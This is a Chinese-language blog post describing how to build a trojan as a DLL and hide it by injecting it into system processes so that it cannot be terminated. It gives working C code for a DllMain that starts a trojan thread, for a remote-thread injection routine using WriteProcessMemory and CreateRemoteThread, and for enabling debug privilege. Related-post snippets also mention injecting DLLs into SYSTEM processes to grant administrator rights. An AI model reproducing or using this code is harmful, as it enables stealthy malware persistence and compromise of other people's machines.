DLL线程注入思路

最新推荐文章于 2023-10-10 00:09:16 发布
最新推荐文章于 2023-10-10 00:09:16 发布
阅读量1.3k 收藏 2
点赞数 1
文章标签: dll null thread token 远程连接 winapi
DLL木马,开始是在DLLMain()中加代码,但是后来发现不行,上网搜到一片文章,原因是要建立一个新进程。

线程注入木马也算是个不太新的方式了,但是在当时一度成为了恐慌.因为在进程中隐藏,而所注入的进程又是系统关键进程,无法终止.至于其他的木马神马神马吧,都是浮云.
       木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函数,让任务管理器不显示木马进程,也有人把自己的木马注册成服务运行,'任务管理器'不显示服务的.这样做只是障眼法,进程还是存在的,最好的方法是让进程不存在,让木马作为其他进程的一个线程来运行.Windows操作系统提出了DLL的概念,其系统API都是通过DLL的形式出现的,应用程序动态链接到DLL来调用API,DLL在内存中只存在一个副本就可以满足不同应用程序的调用了,因此可以把木马写成DLL文件,让他作为进程的一部分运行,最好是系统进程的一部分,一般人很难看到一个进程加载了哪些DLL,也就很难发现这种木马(用IceSword可以看到进程的DLL模块).

一、编写一个DLL木马:
使用IDE : Visual C++ 6.0 Visual Studio.NET
2003/2005都可以.
首先建立一个Win32 Dynamic-Link Library工程.选择 A simple DLL
project建立工程,然后就会看到:
  1. BOOL APIENTRY DllMain( HANDLE hModule, //
  2. 模块句柄.
  3. DWORD ul_reason_for_call, // 调用标志.
  4. LPVOID lpReserved // 返回数据.
  5. )
  6. {
  7. return TRUE;
  8. }
这个是DLL的入口点函数,只能做一些简单的初始化工作.这个函数和WinMain、wWinMain 、_tWinMain、main这四个标准的入口点函数是完全不同的,DllMain会被多次调用,上述四个入口点只被系统调用一次.顺便说一句dll文件结构和exe文件是完全一致的。
  1. DWORD ul_reason_for_call, //
  2. 调用标志.
这个参数由系统传递,用于判断调用DllMain函数时候的状态.可能是以下四个常量:
  1. DLL_PROCESS_ATTACH:
  2. //DLL被进程第一次使用时,就是进程调用LoadLibrary函数时

  4. DLL_THREAD_ATTACH:

  6. DLL_THREAD_DETACH:

  8. DLL_PROCESS_DETACH:
  9. //DLL被释放的时候
判断:当 ul_reason_for_call 等于
DLL_PROCESS_ATTACH
时就新开一个线程启动木马.记住一定要新开一个线程,不能把DllMain当main函数用.
  1. BOOL APIENTRY DllMain( HANDLE
  2. hModule,
  3. DWORD ul_reason_for_call,
  4. LPVOID lpReserved
  5. )
  6. {
  7. switch(ul_reason_for_call)
  8. {
  9. case DLL_PROCESS_ATTACH:
  10. // 启动木马线程.
  11. CreateThread(NULL,0,MainThread,0,0,0);
  12. break;

  14. case DLL_THREAD_ATTACH:
  15. break;

  17. case DLL_THREAD_DETACH:
  18. break;

  20. case DLL_PROCESS_DETACH:
  21. break;
  22. }
  23. return TRUE;
  24. }

  26. DWORD WINAPI MainThread(LPVOID
  27. lpParameter)
  28. {
  29. // 这里就是木马的代码了
  30. ... ...
  31. }
二 DLL木马的启动:

       远程进程插入启动木马:将木马DLL插入运行中的进程空间中,让其运行.
       具体做法是先将系统权限提升到DEBUG模式下,因为只有DEBUG模式才能打开进程句柄.然后用OpenProcess函数远程以
PROCESS_Create_THREAD , PROCESS_VM_OPERATION ,PROCESS_VM_WRITE 的权限打开要插入的进程,得到进程的句柄.用VirtualAllocEx函数给DLL文件的路径分配内存空间,用WriteProcessMemory函数将DLL文件内容写入进程空间中.用CreateRemoteThread函数启动就完成了进程的远程插入。

代码如下:


  3. // 远程插入线程
  4. // char szDllFullPath[] DLL文件完整路径.
  5. // DWORD dwRemoteProcessID 要插入的进程ID号
  6. // 返回: TRUE 插入进程成功
  7. // FALSE 失败
  8. BOOL InjectDll(char szDllFullPath[],DWORD dwRemoteProcessID)
  9. {
  10. HANDLE hRemoteProcess;
  11. if(EnableDebugPriv(SE_DEBUG_NAME) == 0)
  12. {
  13. return FALSE;
  14. }

  16. // 打开远程线程
  17. if((hRemoteProcess = OpenProcess(PROCESS_Create_THREAD |
  18. PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessID))==
  19. NULL)
  20. {
  21. return FALSE;
  22. }

  24. char * pszLibFileRemote;

  26. //使用VirtualAllocEx函数在远程进程内存地址空间分配DLL文件名缓冲区

  28. pszLibFileRemote = (char *)VirtualAllocEx(
  29. hRemoteProcess,NULL,lstrlen(szDllFullPath)+1,MEM_COMMIT,PAGE_READWRITE);

  31. if(pszLibFileRemote == NULL)
  32. {
  33. return FALSE;
  34. }

  36. if(WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void
  37. *)szDllFullPath,lstrlen(szDllFullPath)+1,NULL) == 0)
  38. {
  39. return FALSE;
  40. }

  42. PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
  43. GetProcAddress(GetModuleHandle('Kernel32'),'LoadLibraryA');
  44. if(pfnStartAddr == NULL)
  45. {
  46. return FALSE;
  47. }
  48. // 通过建立远程连接的地址:pfnStartAddr
  49. // 传递参数 pszLibFileRemote 远程启动DLL
  50. // 启动远程线程 LoadLibraryA 通过远程线程调用用户的DLL文件
  51. HANDLE hRemoteThread;
  52. if((hRemoteThread =
  53. CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))
  54. == NULL)
  55. {
  56. return FALSE;
  57. }
  58. return TRUE;
  59. }

  61. 这个函数也会用到的:




  66. // 获取进程ID号
  67. // 如无此进程则返回 0;
  68. // char szProcName[] 进程名: .exe文件.
  69. DWORD GetProcID(char szProcName[])
  70. {
  71. HANDLE th = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  72. PROCESSENTRY32 pe = {sizeof(pe)};
  73. DWORD dwProcID = 0;

  75. BOOL bOK=Process32First(th,&pe);
  76. while(bOK)
  77. {
  78. bOK = Process32Next(th,&pe);

  80. LPCTSTR lpszExeFile = strrchr(pe.szExeFile,′//′);
  81. if(lpszExeFile == NULL)
  82. lpszExeFile = pe.szExeFile;
  83. else
  84. lpszExeFile++;

  86. if(strcmp(szProcName,lpszExeFile) == 0)
  87. {
  88. dwProcID = pe.th32ProcessID;
  89. break;
  90. }
  91. }

  93. return dwProcID;
  94. }




  99. // 提升系统权限到DEBUG模式
  100. int EnableDebugPriv(char szName[])
  101. {
  102. HANDLE hToken;
  103. TOKEN_PRIVILEGES tp;
  104. LUID luid;

  106. // 打开进程环令牌
  107. if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))

  109. {
  110. return 0;
  111. }
  112. if(!LookupPrivilegeValue(NULL,szName,&luid))
  113. {
  114. return 0;
  115. }
  116. tp.PrivilegeCount = 1;
  117. tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  118. tp.Privileges[0].Luid = luid;
  119. // 调整权限
  120. if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))

  122. {
  123. return 0;
  124. }

  126. return 1;
  127. }


wangjieest
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ring3注入总结及编程实现.rar(内带源代码)
04-19
一、导入表注入 2 二、挂起线程注入 12 三、挂起进程注入 19 四、调试器注入 21 五、注册表注入 28 六、钩子注入 32 七、APC注入 37 八、远程线程注入 41 九、输入法注入 45 ...关于Ring3下的反注入思路 60
Dll创建线程?No,大错特错
whl0071的专栏
12-19 916
Dll创建线程?No,大错特错,容易死锁
DLL的多线程
最新发布
m0_74823292的博客
10-10 336
为了解决这个问题,我们可以通过TLS机制,为每一个使用该全局变量的线程都提供一个变量值的副本,每一个线程均可以独立地改变自己的副本,而不会和其它线程的副本冲突。如果一个初始化函数是在线程A调用的,而核心功能函数是在线程B调用的,那么线程A初始化函数的资源就无法对应线程B的核心功能,此外还有核心功能函数间的数据传递,这样的DLL就不是线程安全的,必然导致错误。这是一个优点也是一个缺点。但如果你要保持函数的线程安全,那么静态变量是不能用的,因为静态变量是全局的,是属于进程的,也就是属于进程内线程共享的。
易语言-HPSocket同步操作例子
06-25
数据库操作思路:→先绑定参数→增删改用 连接池.执行sql()命令;查询采用连接池.取记录集()命令→如果服务器返回的是连接池.取记录集(),客户端用记录集.导入()命令,导入服务器返回的数据。 =============...
Detours Express源码(微软API HOOK库)
09-24
程序的设计思路是找一个以System帐号运行的进程,如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等,使用ContinueProcessWithDll在其注入把当前用户加入到 Administrators本地组的DLL,因为该DLL在这些进程...
detour 2.1
07-16
程序的设计思路是找一个以System帐号运行的进程,如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等,使用ContinueProcessWithDll在其注入把当前用户加入到 Administrators本地组的DLL,因为该DLL在这些进程...
【专题四】Rootkit的学习与研究
05-29
9)内核注入dll的一种流氓方法 10)另一种读写进程内存空间的方法 11)完整驱动感染代码 12)Hook Shadow SSDT 13)ring0检测隐藏进程 对于rootkit的研究,涉及到的内容比较多,需要在充分学习理解这些技术的...
dll线程处理vector
02-09
dll开启多线程并处理vector(互斥),平台为vs2010,x64可以直接调试,可以传入函数指针,并且显示处理进度,可以根据需要修改。
原创 DLL编写经验总结(一)使DLL支持多线程
雅荷沁兰的专栏
05-07 5319
最近用Delphi编写DLL比较多,总结几条经验方便以后回顾。需求背景:DLL接口自身是向主调方提供服务,考虑到主调方的不定性以及响应速度问题,需要支持多线程。实现思路DLL在初次加载或者被唤醒的时候会调用DLLMain函数(Delphi的Main函数头已被隐藏,实际上就是主文件的Begin End),触发DLL_Process_Attach事件。可用全局变量DLLProc来处理触发的事件所调...
Delphi 如何解决在DLL的入口函数创建或结束线程时卡死
weixin_30271335的博客
08-20 438
先看一下使用Delphi开发DLL时如何使用MAIN函数, 通常情况下并不会使用到DLL的MAIN函数,因为delphi的框架已经把Main函数隐藏起来 而工程函数的 begin end 默认就是MAIN函数的DLL_PROCESS_ATTACH事件的处理代码,如需要完整的处理其他事件, 如DLL_PROCESS_DETACH,DLL_THREAD_ATTACH,DLL_THREAD_...
DLL线程同步主线程研究(子线程代码放到主线程执行)
weixin_34363171的博客
07-29 195
DLL线程同步主线程研究(子线程代码放到主线程执行) 我们在实际项目经常会用到多线程编程,比如Socket编程等,在创建的线程内同步主线程一般使用Synchronize方法实现子线程操作放到主线程执行,Synchronize使用非常方便,且在2009及以上版本都可以使用匿名方法,这样给我们多线程带来了很大的便利。但是实践证明Synchronize只在主程序内正常工作。如果...
对.net程序进行远程线程注入dll
05-28
对于这个问题,我必须强调,远程线程注入是一种可能被视为恶意的行为,可能会违反计算机使用政策或法律。因此,我不会提供任何有关如何执行此操作的指导或建议。 如果您需要执行远程线程注入,您应该在合法和合适的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值